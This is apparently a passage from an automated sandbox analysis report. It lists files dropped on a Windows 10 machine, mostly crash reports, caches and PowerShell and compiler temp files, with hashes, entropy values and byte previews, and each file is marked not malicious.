SHA-512:	FC844058F8C6E466A1E7A38D76135D00AD58BBAD93F05EF14C5F88FFF051AB516FCFAFE93B66C782D2B54A7FB59C37DC9736D487AE14AFEA63C857919E89E7B2
Malicious:	false
Preview:	O"vs... .......A.......X\...;...{......................0.!..........{A. ....}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................k.". ....}..................B]6. ....}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07473971128122159
Encrypted:	false
SSDEEP:	3:myYeyImoluhvCjn13a/z5YGlllAllcVO/lnlZMxZNQl:myze4ua53qzGG/lAOewk
MD5:	CB9126EE25F2E0B04D69EE7E06735270
SHA1:	C821AEF8472E1BBBC2F46D607CF4B073FD6F4B3D
SHA-256:	4EC4FC8082DB5D4651E600580ABE2C907175215C6B4DF846D4DB9CA69606B491
SHA-512:	67296C483852434564F9BB315C6EB573545EC66414BDC29B66CEF0AF9ACD7A7328B6CBFF10C6B6DF4A6F8C9D5B2C2017E270E5A4230750F71084E0C6FBC8D46F
Malicious:	false
Preview:	q........................................;...{.. ....}.......{A..............{A......{A..........{A]................B]6. ....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_9383261a6d824d8c455af39aecd79066ba3bddaa_07ad8ade_aa756bfa-23f7-4123-9545-26aa21c7b1c7\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.0793968320087
Encrypted:	false
SSDEEP:	384:VW5CZ3mVRw13rjwoqRUZ5eRJHzuiFBY4lO8r:g56mVG13rjARUEJHzuiFBY4lO8
MD5:	3B4DBDC125544117AE0E68972DEFFBE2
SHA1:	3AA6BBB5EE85647ABA800F701C9FE5339646670D
SHA-256:	BE11C9BE14720091A008A37EF4B866185372945D7B1CC5141A7F81F3CF1D032F
SHA-512:	3160F78F6FC8A161A62B03EEF24CA1DDEAF7756F068B925E9D10C665663BEC5D078157ACF2088B10BEA3B130878F3E0737253149DD0E0F44D6EC96D0F79249D1
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.5.7.1.8.6.5.8.6.3.4.8.7.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.7.5.6.b.f.a.-.2.3.f.7.-.4.1.2.3.-.9.5.4.5.-.2.6.a.a.2.1.c.7.b.1.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.f.5.1.9.f.a.-.5.9.b.6.-.4.1.e.2.-.b.f.2.6.-.b.1.6.5.8.7.3.6.d.c.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.c.0.-.0.0.0.1.-.0.0.1.4.-.6.c.b.8.-.0.8.e.4.6.6.8.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.8.:.2.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_9383261a6d824d8c455af39aecd79066ba3bddaa_07ad8ade_af73d1fb-3e26-4abb-a5b8-4af016b4adc3\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.0346179080896687
Encrypted:	false
SSDEEP:	384:Ml+JdCT3mVRw13rj19O9+WG0RxlzuiFBY4lO8r:y+DMmVG13rje9+exlzuiFBY4lO8
MD5:	CFFC099C78BED5E5ACCCA9316732C65E
SHA1:	49AA35D9C16C28040C882AB447FDB6353BF1EA1B
SHA-256:	9E8370796BAC9944EEA1DBAF0D899B7DCCF4AB6DAC2138F2AD5E145288A7BDD8
SHA-512:	E0D8EDAB39289DB183335E7BA64BFCBDCA1E71719207FAD2F3EA85BBAD2ADDC5EF07205FD15B86736C74B7F215300C98D5FD4EF7E8899DDC5231DFC5AC65405B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.5.7.1.8.6.4.7.6.9.0.1.4.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.7.3.d.1.f.b.-.3.e.2.6.-.4.a.b.b.-.a.5.b.8.-.4.a.f.0.1.6.b.4.a.d.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.1.8.5.7.4.f.-.8.f.3.7.-.4.9.b.4.-.a.4.4.9.-.6.f.0.f.8.a.d.d.6.3.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.b.8.-.0.0.0.1.-.0.0.1.4.-.5.6.c.1.-.2.5.d.8.6.6.8.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.8.:.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E9F.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Mar 6 07:10:48 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	802610
Entropy (8bit):	1.4649919005424112
Encrypted:	false
SSDEEP:	1536:fXS2vAsbN5I7ogl1l7vK4z/fzb42AZUhbQ/4y6U:fXS2vAsB54l11K+fPTAZDN7
MD5:	F1C4EA6ACA3922E7B50268215D570F49
SHA1:	1E1E70D51A77593E6DA6B4A998C3BC79B49C9A35
SHA-256:	2D0EE65685751970CB18AD797BC400A49543E2198B960E023877CAA1E751B22F
SHA-512:	F6D93552C6B21F4600D51F86F17BF75639E8612461B1DBAD1773615C1DDAB0B7655A2768E5B49B7A6DF1E4685EF595B5B96FC7D816AD4171D9D701B06A724E22
Malicious:	false
Preview:	MDMP..a..... .......xJ.g.........................U..........$....f......$...............`.......8...........T...........X....#...........f...........h..............................................................................eJ......(i......Lw......................T...........fJ.g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER846C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8550
Entropy (8bit):	3.719686680882183
Encrypted:	false
SSDEEP:	192:R6l7wVeJJynNi7OeYrc4LnzpDY89bJAnef0M4Ijm:R6lXJcnNeYrc4LnzJ4efN8
MD5:	ABAF4A09FC2043FA06C0D42ECF10DBC7
SHA1:	364F35511E02D8229F8B5D994EB3EB625DEF1C90
SHA-256:	940D3E344EDBF61AE09218B6FF88BD5B862A3BAEFE201AEA0D47534A1B5436D9
SHA-512:	7B43F4EBF3982BED854D42D2785F0035E86CF0C922E6F39E43827A0A7434EB9B3EC15164654335831AD16F62A221E759F4303A020F376C3888D32BB3767BBC64
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER84EA.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4854
Entropy (8bit):	4.471051119675888
Encrypted:	false
SSDEEP:	48:cvIwWl8zsltJg771I9GRWpW8VYeYm8M4JY3FRkyq8v2jL2b9Q3Rd:uIjflI7RA7V+JdWpba3Rd
MD5:	0DDE7B75D2A413C9D5B8609192067748
SHA1:	F4E63B3C6B0DC2165AEF032411D77E0C5B3C3773
SHA-256:	AA7E497E40D4FCF34D614531E9F26E5178B8C0BA329E0DE77C4F42B25A6ADCF3
SHA-512:	0D02267FACDDA85AC7A498F1C17E8ACAC2402EEFB9EBF825F87796C1EB1787E9160C692AE58321AC4F169D81645E154A3C33407A72801A4B0A8FA20C3E3A4AA9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="748693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8FB.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Mar 6 07:10:59 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	1044970
Entropy (8bit):	1.566344628655729
Encrypted:	false
SSDEEP:	3072:QAcI+P2esjZ6/BdW2RjTufBEtfQqi6DzTCEJBRmBmhefFE+wS6CxNIeJ:QAct/mk/Ru5toC
MD5:	9D87675ED51A7685FF74B7F720DA9908
SHA1:	F03488AE160F4607DFD080B94C25AEAA6B57E2BE
SHA-256:	6B5AB2A3536369D6BD5B925C9E97624D35F8A13AD8C6E006107E9C71712EF5FD
SHA-512:	8BE7F04F0BAACAA671A3BFA3978B0AB76BB44EEA48432B356D322E46973B81200F1DE9D4E3BF557BFB79C9409CE8ABE74A05F93349DFC797505AADBA8FF5B224
Malicious:	false
Preview:	MDMP..a..... ........J.g............4............Y..T.......$...\l......D%..6...........l.......8...........T............-..J............l..........ln...........o..............................................................................eJ.......o......Lw......................T...........zJ.g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC96.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8510
Entropy (8bit):	3.719318629874459
Encrypted:	false
SSDEEP:	192:R6l7wVeJqk7Yrc4LnzpDO89bYx3If0Com:R6lXJx7Yrc4LnxYOfF
MD5:	448E647D654C6EEEAACF2AB00FFA7BBB
SHA1:	DC495A454646A22C4E9EDFEE70C40F200327B42E
SHA-256:	4A021F5C0FBDB1FADB2BDA040352FE31994801291AAC0EE4107F7708AD9638AC
SHA-512:	6F2838AB7BD478A9EF9477E9C816A8A00FB09903F77D419D3640C7C732DFECB7D4C08BFA098F0FD934A69F0AFD44E8E5C278038B68CC9BF3BBACA8B79F05FD46
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERACD5.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4854
Entropy (8bit):	4.469346816885139
Encrypted:	false
SSDEEP:	48:cvIwWl8zsltJg771I9GRWpW8VYkyYm8M4JY3F9yq8v2qaab9Q3lfd:uIjflI7RA7VtJeW3aaba3lfd
MD5:	FA164A5EFFB6DF3E6C5DEC2B4E1BE99E
SHA1:	82E4B2C16FEAD5AD1559DCEDE249D921EBFDC63E
SHA-256:	36F22F7BF9CC6EAA761A67B0874BA5017806414366DA5E4E851C53EAF669F239
SHA-512:	A5420F175E36DAD1CB9DE0CA4B0E41BE3D264F28630BA4071DBAD04D58C46C802E729160C35C9CC140272A40C5F29C3A1A2FB0A0C940950EEC54EDE495F7D847
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="748693" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	108216
Entropy (8bit):	4.005661820033974
Encrypted:	false
SSDEEP:	768:U7F9oInjxkCG8zOPljk0+ACWHpfnzbNyLYduJxP7pxoZsR1v9nvnFOOmdypfR3YH:YdkIz2rJvzgxhGiwGGnS5mFwiKui+l+a
MD5:	4D0A2A40FDDA2FE41ECF823B86267D55
SHA1:	08C8761D9C7CD47FBF33BB4B039A639FD1F93235
SHA-256:	C83500405638BAD92A75F4E7AB1AF465C4818887C06C48D5500ED57494543A28
SHA-512:	386FB8573F2CA96A4588B70AACDF4C4973BAB5FEAD9450762F1FA4F440E960C88EDCB746CAD667CFBB54FDFC98903F6CB667E9213F331F3BF66ECD821E7EC0B2
Malicious:	false
Preview:	....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	108216
Entropy (8bit):	4.0053574056198284
Encrypted:	false
SSDEEP:	768:fKF9o9njxkRGDzOPljk0+ACWHpfnz/NFLYduJxP7pxoZsR1v9AKwFOOmdypfR3YW:Ndkez2rJvzgIhGiwGGnXumFEiKGi8l+a
MD5:	169999AE7B6A5EE14E6DDCA35DCC60EB
SHA1:	53EA0428383E13FF241B066481E57E6415196F80
SHA-256:	F2B21FB0D719D1C298C5315952964CC57FA2C3AEEAF5CEC088895C321F8E0B3F
SHA-512:	BFB034D56A20774DB147A67C1DCAA51AFB3C44DBA8BABF34CB856362920154CFDBB259BB1C00525A85D74615E8F2B2166FC974FCD8DD084F8C1D72B856A3C429
Malicious:	false
Preview:	....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Windows[1].json

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.199191755646521
Encrypted:	false
SSDEEP:	24:Yzc29HSxTkC3c2wbAVKuHt0drc6hE1opHy:YzDtSxTzDwEwit0drcAEMS
MD5:	6132001F475C8AB21B976893CF7F92E2
SHA1:	E19F3922EACE30FB7665304ACA51972B4EA47F19
SHA-256:	AD5B45BAC10E0BF03D54019A1390067A6677DE536671401355933C21055EF184
SHA-512:	3CC35933AF806D4C7131BB2EC76D67831E8DF420592D1503870A549693F50257DC1F117FBF6F346306972B5FF0BF9C6220EB6ABED72AAA4C3BB0BFD33F3AAA4A
Malicious:	false
Preview:	{"serviceContext":{"serviceActivityId":"42880606-58a0-4a83-8cf5-d1f7612cc74c","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"42880606-58a0-4a83-8cf5-d1f7612cc74c\|2025-03-06T07:11:07.7977795Z\|fabric_msn\|EUS2-A\|Msn_84","tier":"\u0000","clientActivityId":"25090651-CE2C-4596-9CEC-2A7C423572D8"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false,"uncloakAnimation":false},"isPartial":false}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Windows[1].json

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	916
Entropy (8bit):	5.184707752223461
Encrypted:	false
SSDEEP:	24:Yzc2c0Hh1/7kC3c2QXlNaHt0drc6hE1opHy:YzD///7zD8Ot0drcAEMS
MD5:	B66A4E57D52C6708C954062A9801898A
SHA1:	D3CDF45E00FFE805D5282E79ED334241D8D7E978
SHA-256:	50988FA2ADBAE399ABD34FEE9E2F7C9F6345ED25CFC10392F113FAD6D47928A4
SHA-512:	7613F35FFA2A9EEC0B351B6F060F36E599AEFA441819A96A21288B282D805B0A1F85BD6D9FBF8F88AE388568B2C7CE6C1EB8A7622C188FB97708274F34DE2F64
Malicious:	false
Preview:	{"serviceContext":{"serviceActivityId":"224c10b4-f560-4fec-a266-addf6128c74c","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"224c10b4-f560-4fec-a266-addf6128c74c\|2025-03-06T07:10:45.6195989Z\|fabric_msn\|EUS2-A\|News_223","tier":"\u0000","clientActivityId":"B2839CD2-4BE9-4400-AD2A-0BF869E77C09"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false,"uncloakAnimation":false},"isPartial":false}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Windows[1].json

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	916
Entropy (8bit):	5.200467314172657
Encrypted:	false
SSDEEP:	12:YWgc2shCH+0h/mwqkA53c2oh2/H+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCB8QY:Yzc2QCHXvqkC3c2omHt0drc6hE1opHy
MD5:	B98D02EDB16D20A903C8E6863C066ADD
SHA1:	98CD56754BD1602714A54C20D82CCA8363A5E686
SHA-256:	1FB9819545DFE6C691A6CD0506D2195CA4FE0879F16C38920AF6325307C9116B
SHA-512:	E8AF83E80567893BB028ED92ECF7FB68C4926B1015215F94F880979304D105783CB5191AC88B7FC4A42708F8AD45FCC396E5549E0BE5D9B05F01A144DCDEE8AE
Malicious:	false
Preview:	{"serviceContext":{"serviceActivityId":"08828313-d30f-457d-9bde-ebf46128c74c","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"08828313-d30f-457d-9bde-ebf46128c74c\|2025-03-06T07:10:57.1942125Z\|fabric_msn\|EUS2-A\|News_408","tier":"\u0000","clientActivityId":"F382943E-8A19-46B8-82E2-2971F42A647D"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false,"uncloakAnimation":false},"isPartial":false}

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1008963976150743
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grypjYak7YnqqSjNPN5Dlq5J:+RI+ycuZhNQakS8PNnqX
MD5:	74253D95424A094FC9258DA9BA89A74F
SHA1:	FFE8BB158462FA0673D8F55BB5A79A462C08C728
SHA-256:	61362E5390ACE6121E299C328EE4E917E2FCEBBEC191B6FE41BC89048DC0AFFF
SHA-512:	0EB22529F860C13443BB2AD5F35BB378A69E093EDF069FF55680B684E2FD0092E0654E3322E5D9A12BFB41C8315F3CC5A6613507061E5E4B03721502CDFC6DA6
Malicious:	false
